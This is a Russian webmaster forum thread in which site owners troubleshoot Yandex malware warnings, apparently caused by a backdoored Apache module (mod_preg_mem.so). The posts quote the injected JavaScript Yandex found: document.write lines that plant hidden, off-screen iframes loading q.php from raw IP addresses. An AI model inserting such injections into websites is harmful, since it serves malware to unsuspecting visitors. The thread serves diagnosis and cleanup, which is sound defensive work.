- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Давайте вы начнете более адекватно реагировать, всё же вы пришли сюда за помощью...
http://www.revisium.com/ai/
Ну так сделайте, чтобы JS файлы отдавались через ПХП, в чем проблема?
В папку JS кидаем все файлы жабаскрипта. Ложим htaccess в эту папку, которому говорим, чтобы все обращения к этой директории кидал на index.php и в нем реализуем отдачу файлов.
Еще раз скажу - это не панацея, надо лечить от вирусов.
Вашими минусами от меня не убудет, но умнее вы от этого не станете...
TF-Studio, айболит это что? Антивирус или ?
тему "прилепленную" читали?
/ru/forum/774117
айболит - http://www.revisium.com/ai/
В каком файле вирус находит?
тему "прилепленную" читали?
/ru/forum/774117
айболит - http://www.revisium.com/ai/
В каком файле вирус находит?
/smartgifts/workspace/js/plugins.js
в нем нет вируса. Так же как и в других аналогичных файлах. Отсюда и возникла тема. Не может понять либо это скриптом делается, либо дырки в моделях веб-сервера. Интересно то, что яндекс находит вирусы, и сам подсказал где искать.
может и дырки.. /ru/forum/775005
---------- Post added 12-03-2013 at 20:00 ----------
Проверьте libkeyutils .. в зависимости от системы в разных (lib или lib64) местах лежать может
ivan-lev, в панели плекса просто нет доступа к системным файлам... либо плеск старый либо что, но такое ощущение что только пользовательский интерфейс, ничего нет то что связано с системой.
После переписки, сказали что возможно проблема в модулях веб-сервера
А с вероятностью в 95% не в них дело. Читайте сначала прилепленный топик про вирусы.
в панели плекса просто нет доступа
Эм.. а SSH на что?
Вообще, смотря под каким пользово
либо плеск старый
Если есть сомненья, значит старый... Админ, видимо, тоже Вы?
Хотя, я бы сначала причину в файлах сайта поискал..
---------- Post added 12-03-2013 at 20:13 ----------
Что характерно, файлы изменяются, но дата изменения файла не меняется...
У файла 3 даты.. если меняют скриптом, то, как правило только одну...
ctime atime mtime
atime сейчас уже вряд ли поможет.. а вот ctime ...
Кто-то сталкивался с таким: впс плеск, арендован у рбк, на сайте есть фрейворк expression engine.
Сколько времени на сайте провожу ни разу не заметил никакого вируса. Захожу и получаю предупреждение от яндекса, мол вирус на сайте. Пошел в вебмастер - говорят вирус. Идут смотреть не нашел ничего. Пишу ему, они сказали:
При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в js скрипте
вредоносный код следующего содержания:
document.write('<style>.x1vvy5fkyw { position:absolute; left:-1828px; top:-1060px} </style> <div class="x1vvy5fkyw"><iframe src="http://69.89.4.78/909a4fce9e610c7ad320e6942b37edf4/q.php" width="418" height="110"></iframe></div>')
посмотрел все файлы, не нашел ничего.
После переписки, сказали что возможно проблема в модулях веб-сервера, которые могут быть заражены либо иметь дырки, которые собственно и делают такие манипуляции с файлами. Что характерно, файлы изменяются, но дата изменения файла не меняется... Парадокс.
Сталкивался ли кто-то?
Всем доброго времени суток.
Аналогичная ситуация возникла буквально на днях, так и не справился с решением данной задачи... CMS DLE.
Yandex пишет:
document.write('<style>.idr3nt30ft { position:absolute; left:-1552px; top:-1565px} </style> <div class="idr3nt30ft"><iframe src=" http://65.75.171.190/8e75cb5ad37169f76282d79c2cfd0f29/q.php " width="214" height="214"></iframe></div>');
Мы подозреваем, что источник заражения может находится в модуле веб-сервера. Просмотреть список все модулей Вы можете в файле httpd.conf . Проверьте каждый файл модуля через сервис https://www.virustotal.com . Если какой-то из файлов данный сервис признает инфицированным - пришлите его нам в заархивированном виде с паролем, а пароль укажите в письме. Заранее спасибо за Вашу помощь.
Пытался найти данный код на сайте, не нашел подобного... Проверил все запускаемые модули, о которых говорит яндекс, и нашел один называется mod_preg_mem.so. При проверке на вирусы Касперский дал описание как HEUR:Backdoor.Linux.Apmod.gen. Проблема в том, что я не могу отключить этот модуль, нет доступа на изменение конфига этого модуля, хотя root права есть. В какую сторону копать не пойму.